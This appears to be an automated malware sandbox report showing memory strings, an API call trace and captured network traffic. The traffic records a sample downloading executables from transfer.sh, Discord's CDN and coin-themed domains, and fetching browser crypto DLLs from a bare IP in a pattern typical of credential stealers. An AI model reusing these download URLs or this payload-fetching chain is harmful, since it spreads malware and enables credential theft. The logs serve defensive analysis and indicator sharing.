                          Source: svchost.exe, 0000000A.00000003.308396322.0000024462C67000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309664509.0000024462C6A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                          Source: svchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                          Source: svchost.exe, 0000000A.00000003.308406030.0000024462C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309550804.0000024462C4E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                          Source: svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                          Source: svchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                          Source: svchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                          Source: svchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                          Source: svchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                          Source: svchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                          Source: svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                          Source: svchost.exe, 0000000A.00000002.309508121.0000024462C42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                          Source: svchost.exe, 0000000A.00000003.308577243.0000024462C40000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309508121.0000024462C42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                          Source: svchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                          Source: svchost.exe, 0000000A.00000003.308577243.0000024462C40000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                          Source: svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                          Source: svchost.exe, 0000000A.00000002.309611968.0000024462C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                          Source: svchost.exe, 0000000A.00000003.308527230.0000024462C5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                          Source: svchost.exe, 0000000A.00000002.309550804.0000024462C4E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                          Source: svchost.exe, 0000000A.00000003.308459987.0000024462C60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                          Source: svchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                          Source: svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                          Source: svchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                          Source: svchost.exe, 0000000A.00000002.309295721.0000024462C13000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309490707.0000024462C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                          Source: svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                          Source: svchost.exe, 0000000A.00000003.308568100.0000024462C45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                          Source: svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                          Source: svchost.exe, 0000000A.00000002.309478877.0000024462C3A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.286664421.0000024462C31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                          Source: svchost.exe, 0000000A.00000003.308406030.0000024462C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309550804.0000024462C4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                          Source: WerFault.exe, 00000017.00000002.422645887.0000000004E8F000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemetry.m
                          Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                          Source: global trafficHTTP traffic detected: GET /32739433.dat?iddqd=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.233.81.115
                          Source: global trafficHTTP traffic detected: GET /attachments/903666793514672200/930134152861343815/Nidifying.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                          Source: global trafficHTTP traffic detected: GET /abhF HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: goo.su
                          Source: global trafficHTTP traffic detected: GET /XvD HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: goo.su
                          Source: global trafficHTTP traffic detected: GET /get/QbPlFD/G.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/8a444287feca136d19310b76ef81e54fc12.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: softwaresworld.net
                          Source: global trafficHTTP traffic detected: GET /get/ealX1m/11.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /get/2w2PAQ/joke214324.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /@banda5ker HTTP/1.1Host: noc.social
                          Source: global trafficHTTP traffic detected: GET /get/wP2pzq/1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /@banda5ker HTTP/1.1Host: noc.social
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: GET /files/9993_1641737702_2517.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: GET //l/f/D2vuR34BZ2GIX1a3wJC_/2e2f0b66d11308f3e72c19e69852b8803e8aa69b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bit.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sehfdkfjvgn.xyz
                          Source: global trafficHTTP traffic detected: GET //l/f/D2vuR34BZ2GIX1a3wJC_/425dba20a0279b2f685ed1dbaf2a802bdd836261 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:11 GMTContent-Type: text/htmlContent-Length: 153Connection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Tue, 11 Jan 2022 22:38:59 GMTContent-Type: text/plain; charset=utf-8Content-Length: 10Connection: closeRetry-After: Tue, 11 Jan 2022 23:39:02 GMTX-Content-Type-Options: nosniffX-Made-With: <3 by DutchCodersX-Ratelimit-Key: 127.0.0.1,102.129.143.64,102.129.143.64X-Ratelimit-Limit: 10X-Ratelimit-Rate: 600X-Ratelimit-Remaining: 9X-Ratelimit-Reset: 1641940742X-Served-By: Proudly served by DutchCoders
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 18 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
